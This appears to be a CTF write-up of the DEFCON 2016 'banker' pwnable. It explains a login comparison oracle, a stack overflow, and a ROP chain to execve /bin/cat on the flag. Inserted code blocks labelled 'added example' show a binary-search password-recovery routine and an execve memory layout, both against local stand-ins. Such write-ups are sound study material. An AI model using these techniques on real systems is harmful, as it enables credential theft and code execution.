DEFCON 2016 CTF Quals pwnable banker writeup

Categories CTF

Banker is a big statically linked executable:

After about 8 hours (too slow) of painful reversing of the ELF, which contains 965 functions… I am clear about what the server is doing, and two vulnerabilities were found:

Vuln 1: When logging in, if the username does not exist the server returns error code 0; otherwise it checks the password byte by byte and, at the first mismatch, returns 1 or -1 according to whether the user-supplied byte is greater or smaller than the stored one. This turns the login into a comparison oracle: every attempt leaks whether the guess is above or below the real password, so the password can be recovered by binary search instead of exhaustive brute force.
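The following is an added example, not the writeup's exploit, showing how such a comparison oracle is turned into a per-byte binary search. The server is replaced by a constructed stand-in; the model it uses is an assumption, since the page does not give the exact comparison semantics: the oracle reports the sign of the first mismatching byte (1 if the guess byte is greater, -1 if smaller) and 0 only when the whole password matches. It also assumes 7-bit ASCII password bytes, which gives 7 comparison queries per byte (7 bytes × 7 queries is the 49 tries mentioned below), plus one login attempt per recovered prefix to detect completion. A real exploit would send the login request over the socket and parse the returned code instead of calling the local function.

```python
# Added example: recovering a password through a byte-wise comparison oracle.
# The oracle below is a constructed stand-in for the banker login check; its
# exact semantics (sign of first mismatch, 0 on full match, missing guess
# bytes read as 0) are assumptions, not taken from the binary.

def make_oracle(stored: bytes):
    """Return (oracle, counter) simulating the vulnerable login check."""
    queries = {"n": 0}

    def oracle(guess: bytes) -> int:
        queries["n"] += 1
        for i, s in enumerate(stored):
            g = guess[i] if i < len(guess) else 0   # short guess reads as 0
            if g != s:
                return 1 if g > s else -1           # sign of first mismatch
        return 0                                    # full match: login succeeds

    return oracle, queries


def recover_password(oracle, alphabet_max: int = 128, max_len: int = 64) -> bytes:
    """Recover the password one byte at a time.

    At position i every earlier byte is already correct, so the answer depends
    only on the candidate byte c: the oracle returns 1 exactly when
    c > stored[i].  The smallest c that yields 1 is stored[i] + 1, which a
    lower-bound binary search over [0, alphabet_max) finds in
    ceil(log2(alphabet_max)) queries (7 for 7-bit ASCII).
    """
    prefix = b""
    while len(prefix) < max_len:
        if oracle(prefix) == 0:          # the prefix is the whole password
            return prefix
        lo, hi = 0, alphabet_max
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(prefix + bytes([mid])) == 1:
                hi = mid                 # mid > stored byte: search lower
            else:
                lo = mid + 1             # mid <= stored byte: search higher
        prefix += bytes([lo - 1])
    raise ValueError("password longer than max_len")


if __name__ == "__main__":
    oracle, queries = make_oracle(b"s3cr3t!")       # constructed sample secret
    print(recover_password(oracle), queries["n"])
```

The search never needs to probe the exact byte: it only needs to locate the boundary between "too small" and "too large", which is why the cost is logarithmic in the alphabet size rather than linear.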

Vuln 2: There is a stack buffer overflow in the routine that reads usernames and passwords back from /tmp/users.txt. If we log in as admin and create a new user with an over-long password, we can smash the stack by logging out and logging in again as that new user.

exploit:

The exploit is easy: first use binary search to brute-force the password within 49 tries, then add a user with a long password to trigger the stack overflow. I do not know how to use shellcode, so I just ROP to construct an execve("/bin/cat", ["/bin/cat", "flag", NULL], 0) call to get the flag.

You may wonder why not use execve("/bin/sh", 0, 0)? Because the server kills the /bin/sh process and returns a line reading "Segmentation Fault". This behaviour is confusing the first time you see it.

The following is the exploit code:

This is the final data layout in the data section when int 80h is triggered:
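The layout below is an added illustration in Python, not the writeup's exploit code or its real addresses: it shows how the strings and the argv pointer array for execve("/bin/cat", ["/bin/cat", "flag", NULL], NULL) are packed into a writable region and which registers the i386 int 0x80 convention expects. DATA_BASE is a hypothetical address standing in for the binary's .data address (not listed on this page), and the ROP gadgets that write these bytes and load the registers are not shown. The decoder at the end walks the blob the way the syscall handler would, which is a useful sanity check before spending a remote attempt.

```python
# Added example: data layout for execve("/bin/cat", ["/bin/cat", "flag", NULL], NULL)
# via int 0x80 on 32-bit x86.  DATA_BASE is a hypothetical writable address,
# not taken from the banker binary.
import struct

SYS_EXECVE = 11                 # i386 syscall number for execve
DATA_BASE = 0x080E0000          # hypothetical writable address


def p32(v: int) -> bytes:
    return struct.pack("<I", v)


def build_execve_layout(base: int, argv):
    """Return (blob, regs): bytes to place at `base` and the register values
    for int 0x80.  Strings go first (each written once, NUL-terminated), then a
    4-byte aligned argv array of pointers into them ending with a NULL pointer.
    argv[0] doubles as the path in ebx; envp (edx) is NULL.
    """
    blob = bytearray()
    offsets = {}
    for s in argv:
        if s not in offsets:                 # reuse identical strings
            offsets[s] = len(blob)
            blob += s + b"\x00"
    while len(blob) % 4:                     # align the pointer array
        blob += b"\x00"
    argv_off = len(blob)
    for s in argv:
        blob += p32(base + offsets[s])
    blob += p32(0)                           # NULL terminates argv
    regs = {
        "eax": SYS_EXECVE,
        "ebx": base + offsets[argv[0]],      # const char *filename
        "ecx": base + argv_off,              # char *const argv[]
        "edx": 0,                            # char *const envp[] = NULL
    }
    return bytes(blob), regs


def read_cstr(blob: bytes, base: int, addr: int) -> bytes:
    off = addr - base
    return blob[off:blob.index(b"\x00", off)]


def decode_as_kernel_would(blob: bytes, base: int, regs):
    """Walk the layout like the syscall handler: ebx -> path, ecx -> char*
    array until a NULL pointer.  Returns (path, argv)."""
    assert regs["eax"] == SYS_EXECVE
    path = read_cstr(blob, base, regs["ebx"])
    argv, off = [], regs["ecx"] - base
    while True:
        (ptr,) = struct.unpack_from("<I", blob, off)
        if ptr == 0:
            break
        argv.append(read_cstr(blob, base, ptr))
        off += 4
    return path, argv


if __name__ == "__main__":
    blob, regs = build_execve_layout(DATA_BASE, [b"/bin/cat", b"flag"])
    print(blob.hex(), {k: hex(v) for k, v in regs.items()})
    print(decode_as_kernel_would(blob, DATA_BASE, regs))
```

Because "flag" is a relative path, the cat only works if the server's working directory contains the flag file; the same layout with an absolute path costs only a few more bytes of string data.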

